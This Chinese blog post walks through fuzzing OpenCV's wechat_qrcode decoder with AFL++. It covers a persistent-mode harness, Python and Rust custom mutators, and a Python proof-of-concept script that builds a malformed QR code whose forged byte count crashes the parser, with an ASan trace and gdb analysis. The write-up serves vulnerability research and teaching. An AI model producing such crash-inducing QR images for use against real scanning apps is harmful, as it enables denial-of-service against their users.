wechat qrcode bug fuzzing
TL;DR 针对近期爆出来的 opencv_contrib/modules/wechat_qrcode 二维码解析bug,写了 custom mutator (实现了Python版本和Rust版本),利用AFL++顺利fuzzing到了这个bug。
最近重拾fuzzing,学点挖洞技巧,准备找工作了,学术圈我是混不明白了。这个文章就作为学习记录。
new a aflplusplus container
cd /src
git clone [https://github.com/opencv/opencv_contrib.git](https://github.com/opencv/opencv_contrib.git) -b 960b3f685f39c0602b8a0dd35973a82ee72b7e3c
git clone [https://github.com/opencv/opencv.git](https://github.com/opencv/opencv.git) -b 85ea247cc6fd840ee477d03fc9aa31c8c7f6d9ef
mkdir build && cd build
cmake -DCMAKE_C_COMPILER=afl-clang-fast -DCMAKE_CXX_COMPILER=afl-clang-fast++ -DBUILD_SHARED_LIBS=OFF -DOPENCV_EXTRA_MODULES_PATH=/src/opencv_contrib/modules /src/opencv
修改 opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:
#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"
using namespace std;
using namespace cv;
int main(int argc, char **argv) {
if (argc < 2) return 1;
string image_path(argv[1]);
Mat src = imread(image_path, IMREAD_GRAYSCALE);
if (!src.empty()) {
wechat_qrcode::WeChatQRCode detector;
vector<string> outs = detector.detectAndDecode(src);
// print outs
for (size_t i = 0; i < outs.size(); i++) {
cout << outs[i] << endl;
}
}
return 0;
}
AFL_USE_ASAN=1 make -j32 -C modules/wechat_qrcode
target: bin/opencv_test_wechat_qrcode
编译完可以找个poc试一下,确保没编译出问题:
生成poc的代码参考:
import qrcode
from qrcode.util import *
from qrcode import QRCode
def hack_put(self, num, length):
if num == 0:
num = 1 # make a fake length, too big will not crash
for i in range(length):
self.put_bit(((num >> (length - i - 1)) & 1) == 1)
qrcode.util.BitBuffer.put = hack_put # random_put
qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0)
data = "POC".encode("utf-8")
data += b' ' * (19-len(data)-3) # 19为1-L的Total Number of Data Codewords for this Version and EC Level,-3是由于模式和长度指示器共占了24位,正好为3Byte。
user_data=QRData(data, MODE_8BIT_BYTE)
hack_data=QRData(b'', MODE_8BIT_BYTE)
qr.add_data(user_data)
qr.add_data(hack_data)
img = qr.make_image()
img.save('hack.png')
bug分析我就不写了,看上面的pr就能看明白,关于qrcode的更多信息可以参考这篇复现:WECHAT二维码闪退分析 - FreeBuf网络安全行业门户
现就可以找一些二维码图片开始疯狂fuzzing,但是就算很小的二维码图片也有300多字节,如果按照bit变异,很大概率是没法发通过opencv对二维码图片的解析的,变到猴年也很难顺利触法这个bug。
于是自然就想到,要基于正确的二维码图片格式做一些变异。这个方法 evilpan 已经做过尝试,但是他做的变异范围比较广,所有的qrcode的可选字段他都random生成,然后基于生成的正常qrcode做一些bit翻转。他的测试是发了一个月也没看到crash。其实正常的fuzzing就应该是这样,但是我这里就拿着锤子找钉子,做针对性的变异。
AFL++ persistent mode
persistent mode 速度比默认AFL++快很多,官方文档说速度x10 or x20,可以参考:AFLplusplus/instrumentation/README.persistent_mode.md at stable · AFLplusplus/AFLplusplus · GitHub
实际 fuzzing 测试 persist mode 确实比默认编译的 opencv_test_wechat_qrcode 测试快10多倍。
修改 opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:
#include <iostream>
#include <vector>
#include <string>
#include "test_precomp.hpp"
#include "opencv2/objdetect.hpp"
#include "opencv2/wechat_qrcode.hpp"
using namespace std;
using namespace cv;
int fuzz_buf(unsigned char *buf, size_t size) {
Mat src = imdecode(Mat(1, size, CV_8UC1, buf), IMREAD_GRAYSCALE);
if (!src.empty()) {
auto detector = wechat_qrcode::WeChatQRCode();
std::vector<std::string> outs = detector.detectAndDecode(src);
return outs.size();
}
return -1;
}
__AFL_FUZZ_INIT();
int main() {
// anything else here, e.g. command line arguments, initialization, etc.
#ifdef __AFL_HAVE_MANUAL_CONTROL
__AFL_INIT();
#endif
unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF; // must be after __AFL_INIT
// and before __AFL_LOOP!
while (__AFL_LOOP(10000)) {
int len = __AFL_FUZZ_TESTCASE_LEN; // don't use the macro directly in a
// call!
if (len < 8) continue; // check for a required/useful minimum input length
/* Setup function call, e.g. struct target *tmp = libtarget_init() */
/* Call function to be fuzzed, e.g.: */
fuzz_buf(buf, len);
/* Reset state. e.g. libtarget_free(tmp) */
}
return 0;
}
编译目标路径相同:
target: bin/opencv_test_wechat_qrcode
mv bin/opencv_test_wechat_qrcode bin/opencv_test_wechat_qrcode_persist
fuzzing cmd:
afl-fuzz -i corpus/ -o output -t +2000 -- ./opencv_test_wechat_qrcode_persist
corpus 下面放几个能正常解析的qrcode图片
发了将近一天,什么有用的都没发到,解析导致crash的28个文件,全部都是被opencv的代码顺利捕获的cv::Exception
图像解析异常,导致的Aborted也没啥用。并没有执行到目标子模块中的关键decode函数
terminate called after throwing an instance of 'cv::Exception'
what(): OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:77: error: (-215:Assertion failed) static_cast<size_t>(size.height) <= CV_IO_MAX_IMAGE_HEIGHT in function 'validateInputImageSize'
Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
what(): OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:79: error: (-215:Assertion failed) pixels <= CV_IO_MAX_IMAGE_PIXELS in function 'validateInputImageSize'
Aborted (core dumped)
34304
terminate called after throwing an instance of 'cv::Exception'
what(): OpenCV(4.8.0-pre) /src/opencv/modules/imgcodecs/src/loadsave.cpp:75: error: (-215:Assertion failed) static_cast<size_t>(size.width) <= CV_IO_MAX_IMAGE_WIDTH in function 'validateInputImageSize'
这和 evilpan 测试的fuzzing结果是一样的
custom mutator
接下来就是拿着锤子找钉子环节,鉴于我们已经知道了bug的原因:opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp 中 DecodedBitStreamParser::decodeByteSegment 函数里 nBytes,count 赋值有bug,导致读取qrcode里一段data时可能出现数据计数count≠0,而data=“”的情况,最后导致非法内存访问。具体解析可以看上面提到的pr。
简单起见,我们可以定制一个mutator,生成一个小的qrcode,然后疯狂的random变异他一段数据的长度和count这两个字段:
import qrcode
from qrcode.util import *
import random
from qrcode import util, QRCode
from bisect import bisect_left
from io import BytesIO
def hack_data_len(data):
# return len(data) # original
return random.randint(0,18) # make a fake length, too big will not crash
def hack_create_data(version, error_correction, data_list):
buffer = BitBuffer()
for data in data_list:
buffer.put(data.mode, 4)
data_len = hack_data_len(data)
buffer.put(data_len, length_in_bits(data.mode, version))
data.write(buffer)
# Calculate the maximum number of bits for the given version.
rs_blocks = base.rs_blocks(version, error_correction)
bit_limit = sum(block.data_count * 8 for block in rs_blocks)
if len(buffer) > bit_limit:
raise exceptions.DataOverflowError(
"Code length overflow. Data size (%s) > size available (%s)"
% (len(buffer), bit_limit)
)
# Terminate the bits (add up to four 0s).
for _ in range(min(bit_limit - len(buffer), 4)):
buffer.put_bit(False)
# Delimit the string into 8-bit words, padding with 0s if necessary.
delimit = len(buffer) % 8
if delimit:
for _ in range(8 - delimit):
buffer.put_bit(False)
# Add special alternating padding bitstrings until buffer is full.
bytes_to_fill = (bit_limit - len(buffer)) // 8
for i in range(bytes_to_fill):
if i % 2 == 0:
buffer.put(PAD0, 8)
else:
buffer.put(PAD1, 8)
return create_bytes(buffer, rs_blocks)
qrcode.util.create_data = hack_create_data
def init(seed):
"""
Called once when AFLFuzz starts up. Used to seed our RNG.
@type seed: int
@param seed: A 32-bit random value
"""
random.seed(233)
def fuzz(buf, add_buf, max_size):
"""
Called per fuzzing iteration.
@type buf: bytearray
@param buf: The buffer that should be mutated.
@type add_buf: bytearray
@param add_buf: A second buffer that can be used as mutation source.
@type max_size: int
@param max_size: Maximum size of the mutated output. The mutation must not
produce data larger than max_size.
@rtype: bytearray
@return: A new bytearray containing the mutated data
"""
qr = QRCode(1, qrcode.constants.ERROR_CORRECT_L, mask_pattern=0) # 1-L mode data max ot 16
data = b"deadbeef" * random.randint(0, 4)
data2 = b"deadbeef" * random.randint(0, 4)
qr.add_data(QRData(data, MODE_8BIT_BYTE))
qr.add_data(QRData(data2, MODE_8BIT_BYTE))
img = qr.make_image()
img_bytes = BytesIO()
img.save(img_bytes, "png")
return bytearray(img_bytes.getvalue())
这里我们选择 1-L mode ,这个模式最长codeword是19,其中mode和count占据3字节,所以我们能操控的data长度是16,这里使用n个重复的b"deadbeef",最大24,保证能有溢出效果。
qrcode.make_image
总会调用qrcode.util.create_data
,我们这里重写这个方法,唯一的变化就是在向buffer
写data_list
时,控制count字段,使用一个随机的长度 data_len = hack_data_len(data)
,这里hack_data_len
控制在[0,17] 也是刚好能超过16溢出.
fuzzing cmd:
AFL_CUSTOM_MUTATOR_ONLY=1 PYTHONPATH=$PWD AFL_PYTHON_MODULE=qrcode_mutator afl-fuzz -i corpus/ -o output_w_mutator -t +9000 -- ./opencv_test_wechat_qrcode_persist
半个小时就出现了一个crash,第一个crash就顺利命中了,
qrcode 解析 from QRazyBox - QR Code Analysis and Recovery Toolkit (merri.cx)
[AFL++ ca32c4c1ac87] /src/build/fuzzing # ./opencv_test_wechat_qrcode output_w_mutator/id-000000.png
AddressSanitizer:DEADLYSIGNAL
=================================================================
==204888==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000005 (pc 0x7f3e12b0fa60 bp 0x7ffc402fcff0 sp 0x7ffc402fc7a8 T0)
==204888==The signal is caused by a READ memory access.
==204888==Hint: address points to the zero page.
#0 0x7f3e12b0fa60 (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#1 0x55a00ce4a497 in __interceptor_memcpy (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3c6497) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)
#2 0x7f3e12de0892 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_append(char const*, unsigned long) (/lib/x86_64-linux-gnu/libstdc++.so.6+0x14d892) (BuildId: f57e02bfadacc0c923c82457d5e18e1830b5faea)
#3 0x55a00d343a9e in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::append(char const*, unsigned long) /usr/lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/bits/basic_string.h:1246:9
#4 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::append(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, char const*, unsigned long, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:108:12
#5 0x55a00d343a9e in zxing::qrcode::DecodedBitStreamParser::decodeByteSegment(zxing::Ref<zxing::BitSource>, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, int, zxing::common::CharacterSetECI*, zxing::ArrayRef<zxing::ArrayRef<char> >&, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:227:5
#6 0x55a00d348d03 in zxing::qrcode::DecodedBitStreamParser::decode(zxing::ArrayRef<char>, zxing::qrcode::Version*, zxing::qrcode::ErrorCorrectionLevel const&, zxing::ErrorHandler&, int) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoded_bit_stream_parser.cpp:463:25
#7 0x55a00d2509be in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, bool, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:158:20
#8 0x55a00d24d50b in zxing::qrcode::Decoder::decode(zxing::Ref<zxing::BitMatrix>, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/decoder/decoder.cpp:47:30
#9 0x55a00d1d7259 in zxing::qrcode::QRCodeReader::decodeMore(zxing::Ref<zxing::BinaryBitmap>, zxing::Ref<zxing::BitMatrix>, zxing::DecodeHints, zxing::ErrorHandler&) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:120:30
#10 0x55a00d1d3936 in zxing::qrcode::QRCodeReader::decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/zxing/qrcode/qrcode_reader.cpp:46:31
#11 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::Decode(zxing::Ref<zxing::BinaryBitmap>, zxing::DecodeHints) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:89:21
#12 0x55a00d1fab94 in cv::wechat_qrcode::DecoderMgr::TryDecode(zxing::Ref<zxing::LuminanceSource>, std::vector<zxing::Ref<zxing::Result>, std::allocator<zxing::Ref<zxing::Result> > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:78:15
#13 0x55a00d1f465f in cv::wechat_qrcode::DecoderMgr::decodeImage(cv::Mat, bool, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::vector<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > >, std::allocator<std::vector<cv::Point_<float>, std::allocator<cv::Point_<float> > > > >&) /src/opencv_contrib/modules/wechat_qrcode/src/decodermgr.cpp:46:19
#14 0x55a00d1c87e8 in cv::wechat_qrcode::WeChatQRCode::Impl::decode[abi:cxx11](cv::Mat const&, std::vector<cv::Mat, std::allocator<cv::Mat> >&, std::vector<cv::Mat, std::allocator<cv::Mat> >&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:148:34
#15 0x55a00d1c674a in cv::wechat_qrcode::WeChatQRCode::detectAndDecode[abi:cxx11](cv::_InputArray const&, cv::_OutputArray const&) /src/opencv_contrib/modules/wechat_qrcode/src/wechat_qrcode.cpp:100:19
#16 0x55a00cee699f in main /src/opencv_contrib/modules/wechat_qrcode/test/test_main.cpp:27:40
#17 0x7f3e12a74d8f (/lib/x86_64-linux-gnu/libc.so.6+0x29d8f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#18 0x7f3e12a74e3f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x29e3f) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
#19 0x55a00ce31d04 in _start (/src/build/fuzzing/opencv_test_wechat_qrcode+0x3add04) (BuildId: 96f5964f2bbc86cfa7923e5f345d712478fc66a8)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xc4a60) (BuildId: 69389d485a9793dbe873f0ea2c93e02efaa9aa3d)
==204888==ABORTING
custom mutator(Rust)
python 太慢,搞个rust版本,afl++有官方example可以参考:
image = "0.22.0”
qrcode git v0.11.2
rand = "0.8.4”
#![cfg(unix)]
#![allow(unused_variables)]
use custom_mutator::{export_mutator, CustomMutator};
use image::Luma;
use qrcode::QrCode;
use qrcode::bits::Bits;
use qrcode::types::{EcLevel, Version};
use rand::Rng;
struct ExampleMutator {
own_image_buffer: Vec<u8>,
}
impl CustomMutator for ExampleMutator {
type Error = ();
fn init(seed: u32) -> Result<Self, Self::Error> {
// print a message to console
println!("ExampleMutator init() called with seed {}", seed);
Ok(Self {
own_image_buffer: Vec::new(),
})
}
fn fuzz<'b, 's: 'b>(
&'s mut self,
buffer: &'b mut [u8],
add_buff: Option<&[u8]>,
max_size: usize,
) -> Result<Option<&'b [u8]>, Self::Error> {
let bytes_data: &[u8] = b"deadbeef";
let bytes_data1 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));
let bytes_data2 = bytes_data.repeat(rand::thread_rng().gen_range(0..=3));
let mut bits: Bits = Bits::new(Version::Normal(1));
bits.push_byte_data(bytes_data1.as_slice());
bits.push_byte_data(bytes_data2.as_slice());
bits.push_terminator(EcLevel::L);
let qrcode = QrCode::with_bits(bits, EcLevel::L).unwrap();
let image = qrcode.render::<Luma<u8>>().build();
image.save("./temp-rust-qrcode.png").unwrap();
let bytes_vec = std::fs::read("./temp-rust-qrcode.png").unwrap();
self.own_image_buffer = bytes_vec;
Ok(Some(self.own_image_buffer.as_slice()))
}
}
export_mutator!(ExampleMutator);
这里需要魔改rust-qrcode这个库,关键是bits.rs
文件中的一个函数:
use rand::Rng;
impl Bits {
/// Encodes 8-bit byte data to the bits.
pub fn push_byte_data(&mut self, data: &[u8]) -> QrResult<()> {
// use global RNG generate a random number between 0 and 18
let data_len = rand::thread_rng().gen_range(0..=17);
self.push_header(Mode::Byte, data_len)?;
for b in data {
self.push_number(8, u16::from(*b));
}
Ok(())
}
}
把 push_header 这里第二个参数用随机数替代,和python代码里一个意思。rust-qrcode 项目也需要添加rand crate依赖。
魔改完这个代码,生成的qrcode不能过 ec.rs
中 construct_codewords 函数的一个断言,我直接把这个断言注释了。
编译完得到的so文件路径指定传给下面这个环境变量
export AFL_CUSTOM_MUTATOR_LIBRARY=/src/build/fuzzing/rust_mutator/target/debug/examples/libexample_mutator.so
fuzzing cmd:
AFL_CUSTOM_MUTATOR_ONLY=1 afl-fuzz -i corpus/ -o output_w_rust -t +5000 -- ./opencv_test_wechat_qrcode_persist
速度快不少,从每秒6次到每秒180次:
manual check
gdb, 根据上面的执行报错,断点敲一个在zxing::qrcode::DecodedBitStreamParser::decodeByteSegment上,敲一个在memcpy上,run。
下面是读取第一个数据块时的情况,根据amd64的调用约定void * __cdecl memcpy ( void * dst, const void * src, size_t count )
,顺序为rdi,rsi,rdx,rdx存了长度16,地址rsi存的是字符串“deadbeefdeadbeef”
继续执行,到下一个数据块读取,
memcpy要执行长度为13的copy,然而 rsi
指向0x0,所以必然非法访问。
summary
这个bug确实挺难fuzzing的,要针对decode过程针对性的设计mutator,才有可能快速找到,否则就只能一直在二维码图片解析上绕圈。
我这里是因为先知道了bug在哪,然后针对性设计mutator,才顺利找到的,所以非常weak,要对所有字段都fuzzing的话那就要更大程度的重写qrcode的生成代码,还要对qrcode有比较深入的了解。
另外,现在这个qrcode mutator只是随机变异,好像是不能利用到AFL++的power schedule,我感觉应该是没有顺利应用覆盖率导向。
作为一个学习的demo来说,就还行吧。
ref:
针对二维码解析库的 Fuzzing 测试 (seebug.org)